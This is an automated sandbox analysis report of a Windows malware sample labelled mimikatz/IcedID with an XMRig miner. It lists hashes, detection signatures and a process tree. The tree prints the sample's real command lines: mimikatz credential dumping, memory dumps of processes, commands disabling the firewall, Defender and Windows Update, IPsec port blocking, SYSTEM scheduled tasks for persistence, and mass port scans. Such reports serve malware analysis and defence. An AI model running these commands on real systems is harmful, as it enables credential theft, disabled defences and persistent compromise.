Analysis

  • max time kernel
    152s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-04-2024 12:26

General

  • Target

    2024-04-25_e9893c0c59729de80c47310291c294ee_hacktools_icedid_mimikatz.exe

  • Size

    8.9MB

  • MD5

    e9893c0c59729de80c47310291c294ee

  • SHA1

    db66e51a79883ec36271c4287cadb4154591c5da

  • SHA256

    694b769dea6d9d68ca2d056c2fb10f2c71444fcf9501546ccf81ae33ca07a956

  • SHA512

    53cbb2d8d44953bbc46ef0220ad50a32843ccca3c354f1fe2d5bd6acea63bde17f4a9ee4d2d5220cbac1589f4de7399ce2465bc5f913e1e26bc96a992d996a89

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (22169) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • UPX dump on OEP (original entry point) 40 IoCs
  • XMRig Miner payload 11 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 4 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2064
      • C:\Windows\TEMP\bestbnuee\lslnam.exe
        "C:\Windows\TEMP\bestbnuee\lslnam.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3140
    • C:\Users\Admin\AppData\Local\Temp\2024-04-25_e9893c0c59729de80c47310291c294ee_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-25_e9893c0c59729de80c47310291c294ee_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nlmttyea\iylstni.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4776
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:1548
        • C:\Windows\nlmttyea\iylstni.exe
          C:\Windows\nlmttyea\iylstni.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3132
    • C:\Windows\nlmttyea\iylstni.exe
      C:\Windows\nlmttyea\iylstni.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3852
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:932
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:1736
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2320
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:1580
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:5056
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2812
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:1556
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                      PID:1332
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                      2⤵
                        PID:684
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filteraction name=BastardsList action=block
                        2⤵
                          PID:3556
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\nbuyiybyv\smnabayei\wpcap.exe /S
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1388
                          • C:\Windows\nbuyiybyv\smnabayei\wpcap.exe
                            C:\Windows\nbuyiybyv\smnabayei\wpcap.exe /S
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            • Suspicious use of WriteProcessMemory
                            PID:4356
                            • C:\Windows\SysWOW64\net.exe
                              net stop "Boundary Meter"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4616
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "Boundary Meter"
                                5⤵
                                  PID:2248
                              • C:\Windows\SysWOW64\net.exe
                                net stop "TrueSight Meter"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:656
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:3064
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4860
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:1288
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:5096
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:2180
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:1112
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:2040
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:2500
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:4664
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:1228
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:844
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\nbuyiybyv\smnabayei\tttqsriea.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nbuyiybyv\smnabayei\Scant.txt
                                                2⤵
                                                  PID:1748
                                                  • C:\Windows\nbuyiybyv\smnabayei\tttqsriea.exe
                                                    C:\Windows\nbuyiybyv\smnabayei\tttqsriea.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nbuyiybyv\smnabayei\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:316
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\nbuyiybyv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nbuyiybyv\Corporate\log.txt
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  PID:3064
                                                  • C:\Windows\nbuyiybyv\Corporate\vfshost.exe
                                                    C:\Windows\nbuyiybyv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2832
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vlmtratem" /ru system /tr "cmd /c C:\Windows\ime\iylstni.exe"
                                                  2⤵
                                                    PID:4420
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:3140
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "vlmtratem" /ru system /tr "cmd /c C:\Windows\ime\iylstni.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:1504
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tyitsyimt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F"
                                                      2⤵
                                                        PID:2812
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:1992
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "tyitsyimt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:4220
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "numblgjvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F"
                                                          2⤵
                                                            PID:1380
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:1388
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "numblgjvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:3556
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:4860
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                  PID:1868
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                    PID:1124
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:1860
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                      2⤵
                                                                        PID:4552
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                        2⤵
                                                                          PID:332
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                            PID:4564
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static set policy name=Bastards assign=y
                                                                            2⤵
                                                                              PID:1364
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                              2⤵
                                                                                PID:1096
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                2⤵
                                                                                  PID:2500
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                  2⤵
                                                                                    PID:3112
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                                    2⤵
                                                                                      PID:3592
                                                                                    • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                      C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 796 C:\Windows\TEMP\nbuyiybyv\796.dmp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5056
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop SharedAccess
                                                                                      2⤵
                                                                                        PID:4836
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop SharedAccess
                                                                                          3⤵
                                                                                            PID:3532
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                                              4⤵
                                                                                                PID:4124
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                                            2⤵
                                                                                              PID:3416
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh firewall set opmode mode=disable
                                                                                                3⤵
                                                                                                • Modifies Windows Firewall
                                                                                                PID:4984
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                                              2⤵
                                                                                                PID:2840
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh Advfirewall set allprofiles state off
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:4720
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c net stop MpsSvc
                                                                                                2⤵
                                                                                                  PID:1728
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net stop MpsSvc
                                                                                                    3⤵
                                                                                                      PID:4860
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                                        4⤵
                                                                                                          PID:2180
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c net stop WinDefend
                                                                                                      2⤵
                                                                                                        PID:1124
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net stop WinDefend
                                                                                                          3⤵
                                                                                                            PID:5104
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                                              4⤵
                                                                                                                PID:1388
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c net stop wuauserv
                                                                                                            2⤵
                                                                                                              PID:64
                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                net stop wuauserv
                                                                                                                3⤵
                                                                                                                  PID:3292
                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                                    4⤵
                                                                                                                      PID:4420
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                                  2⤵
                                                                                                                    PID:4256
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config MpsSvc start= disabled
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:4624
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                                    2⤵
                                                                                                                      PID:2656
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc config SharedAccess start= disabled
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3660
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                                      2⤵
                                                                                                                        PID:5032
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          3⤵
                                                                                                                            PID:332
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc config WinDefend start= disabled
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:4924
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c sc config wuauserv start= disabled
                                                                                                                          2⤵
                                                                                                                            PID:4452
                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                              sc config wuauserv start= disabled
                                                                                                                              3⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:4428
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 392 C:\Windows\TEMP\nbuyiybyv\392.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4124
                                                                                                                          • C:\Windows\TEMP\xohudmc.exe
                                                                                                                            C:\Windows\TEMP\xohudmc.exe
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:1144
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2064 C:\Windows\TEMP\nbuyiybyv\2064.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2312
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2416 C:\Windows\TEMP\nbuyiybyv\2416.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4924
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2520 C:\Windows\TEMP\nbuyiybyv\2520.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1124
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2708 C:\Windows\TEMP\nbuyiybyv\2708.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1384
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 704 C:\Windows\TEMP\nbuyiybyv\704.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4420
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3732 C:\Windows\TEMP\nbuyiybyv\3732.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:844
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3880 C:\Windows\TEMP\nbuyiybyv\3880.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5060
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3944 C:\Windows\TEMP\nbuyiybyv\3944.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2804
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 4028 C:\Windows\TEMP\nbuyiybyv\4028.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3536
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2072 C:\Windows\TEMP\nbuyiybyv\2072.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4312
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 4764 C:\Windows\TEMP\nbuyiybyv\4764.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2952
                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 544 C:\Windows\TEMP\nbuyiybyv\544.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5048
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /c C:\Windows\nbuyiybyv\smnabayei\scan.bat
                                                                                                                            2⤵
                                                                                                                              PID:2092
                                                                                                                              • C:\Windows\nbuyiybyv\smnabayei\aubeaujvt.exe
                                                                                                                                aubeaujvt.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in Windows directory
                                                                                                                                PID:4776
                                                                                                                            • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                              C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3856 C:\Windows\TEMP\nbuyiybyv\3856.dmp
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:6208
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                              2⤵
                                                                                                                                PID:6788
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                  3⤵
                                                                                                                                    PID:7000
                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                                    3⤵
                                                                                                                                      PID:6972
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                      3⤵
                                                                                                                                        PID:4388
                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                                        3⤵
                                                                                                                                          PID:1840
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                          3⤵
                                                                                                                                            PID:2076
                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                                            3⤵
                                                                                                                                              PID:4540
                                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2244 C:\Windows\TEMP\nbuyiybyv\2244.dmp
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:3404
                                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3576 C:\Windows\TEMP\nbuyiybyv\3576.dmp
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5540
                                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2092 C:\Windows\TEMP\nbuyiybyv\2092.dmp
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5320
                                                                                                                                          • C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe
                                                                                                                                            C:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 1112 C:\Windows\TEMP\nbuyiybyv\1112.dmp
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:7064
                                                                                                                                        • C:\Windows\SysWOW64\jobnom.exe
                                                                                                                                          C:\Windows\SysWOW64\jobnom.exe
                                                                                                                                          1⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:380
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3592 --field-trial-handle=2328,i,5873823382323802923,13134441441264702821,262144 --variations-seed-version /prefetch:8
                                                                                                                                          1⤵
                                                                                                                                            PID:4388
                                                                                                                                          • C:\Windows\system32\cmd.EXE
                                                                                                                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F
                                                                                                                                            1⤵
